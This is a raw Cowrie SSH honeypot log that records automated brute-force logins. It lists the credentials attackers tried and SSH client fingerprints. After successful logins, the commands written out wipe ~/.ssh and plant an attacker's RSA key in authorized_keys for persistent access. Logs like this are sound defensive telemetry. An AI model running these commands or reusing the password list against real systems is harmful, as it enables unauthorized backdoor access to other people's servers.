macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:40:51.256088Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer123456","message":"login attempt [root/Qwer123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:40:52.031198Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:40:52.478188Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:40:52.479008Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:40:52.480209Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:40:52.679778Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:40:53.091685Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:40:53.092541Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:40:53.288569Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:40:53.289515Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":48029,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf9adbd599c0","protocol":"ssh","message":"New connection: 103.100.209.195:48029 (1.2.3.4:22) [session: bf9adbd599c0]","sensor":"my-vps","timestamp":"2025-09-09T00:40:53.493202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:40:53.499095Z","src_ip":"103.100.209.195","session":"bf9adbd599c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:40:53.700281Z","src_ip":"103.100.209.195","session":"bf9adbd599c0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:40:54.521322Z","src_ip":"103.100.209.195","session":"bf9adbd599c0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:40:55.733977Z","src_ip":"103.100.209.195","session":"bf9adbd599c0"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":48575,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d04566c81bd","protocol":"ssh","message":"New connection: 103.100.209.195:48575 (1.2.3.4:22) [session: 8d04566c81bd]","sensor":"my-vps","timestamp":"2025-09-09T00:40:55.935840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:40:55.939035Z","src_ip":"103.100.209.195","session":"8d04566c81bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:40:56.142845Z","src_ip":"103.100.209.195","session":"8d04566c81bd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:40:56.973679Z","src_ip":"103.100.209.195","session":"8d04566c81bd"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:40:57.181338Z","src_ip":"103.100.209.195","session":"4ff349a08696"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:40:57.184275Z","src_ip":"103.100.209.195","session":"8d04566c81bd"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":46492,"dst_ip":"1.2.3.4","dst_port":22,"session":"2950b2b7123b","protocol":"ssh","message":"New connection: 5.202.105.236:46492 (1.2.3.4:22) [session: 2950b2b7123b]","sensor":"my-vps","timestamp":"2025-09-09T00:41:22.247986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:41:22.262538Z","src_ip":"5.202.105.236","session":"2950b2b7123b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:41:22.400844Z","src_ip":"5.202.105.236","session":"2950b2b7123b"}
{"eventid":"cowrie.login.failed","username":"master","password":"pass","message":"login attempt [master/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T00:41:22.965277Z","src_ip":"5.202.105.236","session":"2950b2b7123b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:41:24.100294Z","src_ip":"5.202.105.236","session":"2950b2b7123b"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":33100,"dst_ip":"1.2.3.4","dst_port":22,"session":"77f2e835898b","protocol":"ssh","message":"New connection: 43.156.132.147:33100 (1.2.3.4:22) [session: 77f2e835898b]","sensor":"my-vps","timestamp":"2025-09-09T00:41:44.148151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:41:44.149972Z","src_ip":"43.156.132.147","session":"77f2e835898b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:41:44.394207Z","src_ip":"43.156.132.147","session":"77f2e835898b"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"lsfadmin@2025","message":"login attempt [lsfadmin/lsfadmin@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T00:41:45.410559Z","src_ip":"43.156.132.147","session":"77f2e835898b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:41:46.657035Z","src_ip":"43.156.132.147","session":"77f2e835898b"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":43922,"dst_ip":"1.2.3.4","dst_port":22,"session":"79f2de278d14","protocol":"ssh","message":"New connection: 152.32.129.236:43922 (1.2.3.4:22) [session: 79f2de278d14]","sensor":"my-vps","timestamp":"2025-09-09T00:41:57.197311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:41:57.198212Z","src_ip":"152.32.129.236","session":"79f2de278d14"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":60422,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0ffbe366d53","protocol":"ssh","message":"New connection: 103.100.209.195:60422 (1.2.3.4:22) [session: d0ffbe366d53]","sensor":"my-vps","timestamp":"2025-09-09T00:41:57.389673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:41:57.418444Z","src_ip":"103.100.209.195","session":"d0ffbe366d53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:41:57.452356Z","src_ip":"152.32.129.236","session":"79f2de278d14"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:41:57.624054Z","src_ip":"103.100.209.195","session":"d0ffbe366d53"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":45414,"dst_ip":"1.2.3.4","dst_port":22,"session":"54169a92487e","protocol":"ssh","message":"New connection: 51.250.72.176:45414 (1.2.3.4:22) [session: 54169a92487e]","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.195345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.196141Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.230059Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@12345","message":"login attempt [root/Admin@12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.403433Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:41:58.494794Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.495501Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.496486Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.login.failed","username":"public","password":"public123","message":"login attempt [public/public123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.498084Z","src_ip":"103.100.209.195","session":"d0ffbe366d53"}
{"eventid":"cowrie.login.failed","username":"data","password":"qwerty","message":"login attempt [data/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.511421Z","src_ip":"152.32.129.236","session":"79f2de278d14"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.530850Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:41:58.692907Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.695602Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.731439Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.732325Z","src_ip":"51.250.72.176","session":"54169a92487e"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":45550,"dst_ip":"1.2.3.4","dst_port":22,"session":"62fc3ee42104","protocol":"ssh","message":"New connection: 51.250.72.176:45550 (1.2.3.4:22) [session: 62fc3ee42104]","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.775512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:41:58.776145Z","src_ip":"51.250.72.176","session":"62fc3ee42104"}
